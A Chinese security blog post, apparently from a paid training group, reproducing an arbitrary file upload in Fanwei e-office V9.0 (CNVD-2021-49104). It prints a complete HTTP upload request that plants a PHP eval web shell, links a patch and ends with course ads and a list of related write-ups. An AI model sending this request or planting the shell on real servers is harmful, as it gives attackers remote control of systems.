文章来源|MS08067 Web安全知识星球

本文作者:Taoing(Web漏洞挖掘班讲师)

参考:

https://cnvd.org.cn/flaw/show/CNVD-2021-49104
https://mp.weixin.qq.com/s/P75K_0869h-nWHRMu06zgQ
https://mp.weixin.qq.com/s/J4R-PRJq_oi58iWKh_1Oiw

泛微oa跟eoffice区别:

常见oa是ecology,eoffice是轻量版

一、漏洞概述

泛微e-office是泛微旗下的一款标准协同移动办公平台。

泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。

二、影响范围

泛微e-office V9.0

三、漏洞复现

安装包:

链接: https://pan.baidu.com/s/1i4DQ4YD 密码: fegm

POC:

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 333
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg<?php
$a=$_POST['H'];
eval("$a");//eval会将输入的$a作为php语句执行,因此只要对_赋一定的system命令值,就能够执行系统命令
?>--e64bdf16c554bbc109cecef6451c26a4--

四、修复方案

厂商已提供漏洞修补方案,建议用户下载使用:
http://v10.e-office.cn/eoffice9update/safepack.zip

课程咨询请联系小客服

扫描下方二维码加入星球学习

加入后邀请你进入内部微信群,内部微信群永久有效!

 

 

来和5000+位同学一起加入星球学习吧!

泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)相关推荐

  1. 【漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)

    0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台. 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可 ...

  2. 泛微 e-office v9.0任意文件上传漏洞{CNVD-2021-49104}

    目录 漏洞介绍 影响版本 漏洞环境 漏洞复现一 漏洞复现二 修复方法

  3. vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...

    文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...

  4. 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...

  5. WeiPHP5.0 前台任意文件上传漏洞

    本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...

  6. 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell

    点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...

  7. php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞

    事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...

  8. 任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞

    发布日期:2012-11-28 更新日期:2012-12-04 受影响系统: ozerov BigDump 0.29b 描述: ------------------------------------ ...

  9. 详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

     聚焦源代码安全,网罗国内外最新资讯! 概述 Sonlogger 是土耳其SFC 公司 开发的一款应用软件,兼容土耳其<第5651号法>,是一款基于 Web 的 SonicWall 防火墙 ...

最新文章

  1. 火出圈!河南大学教授毕业典礼金句频现:躺平得了初一,躺平不到十五!
  2. mysql全量备份与增量备份_Mysql增量备份与全量备份
  3. servlet返回数据_JavaEE の Servlet - Http/Servlet - Day14 - 190507
  4. GridView控件添加鼠标移入移出时背景行变色的效果
  5. iframe cross domain
  6. 麒麟操作系统|Linux下低延时RTMP|RTSP直播播放实现
  7. 关于字符串和字符数组的再讨论
  8. 怎么把pdf文件转换成word文件
  9. 【剖析 | SOFARPC 框架】系列之 SOFARPC 注解支持剖析
  10. 经过了多种方法的尝试,终于找到Quartus破解成功但是没有办法编译的解决方法
  11. VScode配置C/C++环境以及stdafx.h报错解决方法
  12. Visual Studio中绘制UML用例图
  13. IDEA 2018下载及破解
  14. 3dMax 单位设置(门)
  15. 超频到3200最佳时序_ddr4内存时序多少为好
  16. git回退到某个commit
  17. spring.factory
  18. 极限与连续知识点总结_大一上学期《高等数学》知识整理-第一章 极限与连续...
  19. M1芯片完美运行安卓模拟器,简单无坑
  20. w7计算机配置在哪里打开,win7的运行在哪里打开 win7打开运行的方法【图文】

热门文章

  1. 小程序时间轴和地区列表的实现,js+css实现时间轴效果
  2. MD5加密-Java版(可直接使用)
  3. 开关电源环路学习笔记(7)-BUCK电源环路仿真实验验证
  4. MATLAB读取txt,excel,ASCII文件
  5. 初学者如何系统性地学习Linux?
  6. html如何设置打印样式?
  7. 如何调整HTML段落宽度,word空格宽度不一样 选中需要调节间距的文字段落
  8. 限制html窗口最小宽度,给页面一个最小宽度,小于这个宽度时,出现横向滚动条...
  9. 基于仿真的优化 matlab ansys,桁架结构优化的MATLAB和ANSYS联合仿真
  10. ps样式如何导入?Photoshop样式导入教程